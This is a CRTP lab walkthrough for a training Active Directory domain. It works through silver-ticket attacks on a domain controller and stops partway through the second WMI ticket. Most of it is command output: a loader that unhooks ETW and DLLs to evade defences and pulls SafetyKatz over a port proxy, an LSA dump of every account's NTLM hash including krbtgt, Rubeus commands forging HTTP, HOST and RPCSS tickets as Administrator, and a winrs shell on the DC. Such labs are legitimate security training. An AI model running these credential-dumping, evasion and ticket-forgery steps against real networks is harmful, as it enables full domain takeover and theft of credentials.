crtp-09

Learning Object 9

Tasks

1 – Try to get command execution on the domain controller by creating silver ticket for:

  • HTTP

  • WMI

Flag 18 [dcorp-dc] – The service whose Silver Ticket can be used for winrs or PowerShell Remoting 🚩

Solutions
1 – Try to get command execution on the domain controller by creating silver ticket for:

Based on the last task we already have the hash for the machine account of the domain controller (dcorp-dc$).

c:\Users\student98>winrs -r:dcorp-dc cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.98


C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::evasive-lsa /patch exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Nov  5 2024 21:52:02
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::evasive-lsa /patch
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID  : 00000459 (1113)
User : sqladmin
LM   :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID  : 0000045a (1114)
User : websvc
LM   :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID  : 0000045b (1115)
User : srvadmin
LM   :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID  : 0000045d (1117)
User : appadmin
LM   :
NTLM : d549831a955fee51a43c83efb3928fa7

RID  : 0000045e (1118)
User : svcadmin
LM   :
NTLM : b38ff50264b74508085d82c69794a4d8

RID  : 0000045f (1119)
User : testda
LM   :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID  : 00000460 (1120)
User : mgmtadmin
LM   :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID  : 00000461 (1121)
User : ciadmin
LM   :
NTLM : e08253add90dccf1a208523d02998c3d

RID  : 00000462 (1122)
User : sql1admin
LM   :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID  : 00001055 (4181)
User : studentadmin
LM   :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID  : 000042cd (17101)
User : devopsadmin
LM   :
NTLM : 63abbf0737c59a3142175b1665cd51ee

--snip--

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : 4855e21503a77d55411cb38f183cb60e

RID  : 00000451 (1105)
User : DCORP-ADMINSRV$
LM   :
NTLM : b5f451985fd34d58d5120816d31b5565

RID  : 00000452 (1106)
User : DCORP-APPSRV$
LM   :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID  : 00000453 (1107)
User : DCORP-CI$
LM   :
NTLM : d4500252b22d511864dcb2dee1122192

RID  : 00000454 (1108)
User : DCORP-MGMT$
LM   :
NTLM : 0878da540f45b31b974f73312c18e754

RID  : 00000455 (1109)
User : DCORP-MSSQL$
LM   :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID  : 00000456 (1110)
User : DCORP-SQL1$
LM   :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID  : 0000106a (4202)
User : DCORP-STDADMIN$
LM   :
NTLM : ec8c3d52877e2d67ed092a474b56549e

--snip--

RID  : 0000044f (1103)
User : mcorp$
LM   :
NTLM : fc7226cfc10876ce4a99e15fb079f9a0

RID  : 00000450 (1104)
User : US$
LM   :
NTLM : 193d615216655a7389a50be49ebf1ad6

RID  : 00000458 (1112)
User : ecorp$
LM   :
NTLM : 72d5873b88899140a1727520303af6a0

mimikatz(commandline) # exit
Bye!

C:\Users\svcadmin>

.

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : 4855e21503a77d55411cb38f183cb60e
HTTP

We can create a Silver Ticket that provides us access to the HTTP service (WinRM) on DC:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:e4ce16e20da2e11d2901e0fb8a4f28b0 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
c:\Users\student98>klist purge

Current LogonId is 0:0x14e3f3c4
        Deleting all tickets:
        Ticket(s) purged!

c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (0)

c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ServiceKey     : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : http
[*] Target         : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'http/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime       : 10/23/2025 5:43:13 AM
[*] StartTime      : 10/23/2025 5:43:13 AM
[*] EndTime        : 10/23/2025 3:43:13 PM
[*] RenewTill      : 10/30/2025 5:43:13 AM

[*] base64(ticket.kirbi):

      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
      cnAubW9uZXljb3JwLmxvY2Fs


[+] Ticket successfully imported!

c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:43:13 (local)
        End Time:   10/23/2025 15:43:13 (local)
        Renew Time: 10/30/2025 5:43:13 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\Users\student98>

 

We can check if we got the correct service ticket:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist

And run klist or C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args klist we can see it

http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL

c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: http/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 10/23/2025 5:43:13 (local)
        End Time:   10/23/2025 15:43:13 (local)
        Renew Time: 10/30/2025 5:43:13 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\Users\student98>

let’s try accessing it using winrs. Note that we are using FQDN of dcorp-dc as that is what the service ticket has:

winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
set username
set computername
c:\Users\student98>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

C:\Users\Administrator>

 

WMI

For accessing WMI, we need to create two tickets: one for HOST service and another for RPCSS.

We can start to run the following commands from an elevated shell:

C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

Verify that tickets generated are present:

C:\Windows\system32>cd c:\users\student98

c:\Users\student98>klist

Current LogonId is 0:0x14e3f3c4

Cached Tickets: (0)

c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain         : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID            : S-1-5-21-719815819-3726368948-3917688648
[*] UserId         : 500
[*] Groups         : 544,512,520,513
[*] ServiceKey     : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : host
[*] Target         : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'host/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime       : 10/23/2025 5:58:07 AM
[*] StartTime      : 10/23/2025 5:58:07 AM
[*] EndTime        : 10/23/2025 3:58:07 PM
[*] RenewTill      : 10/30/2025 5:58:07 AM

[*] base64(ticket.kirbi):

      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
      cnAubW9uZXljb3JwLmxvY2Fs


[+] Ticket successfully imported!


c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
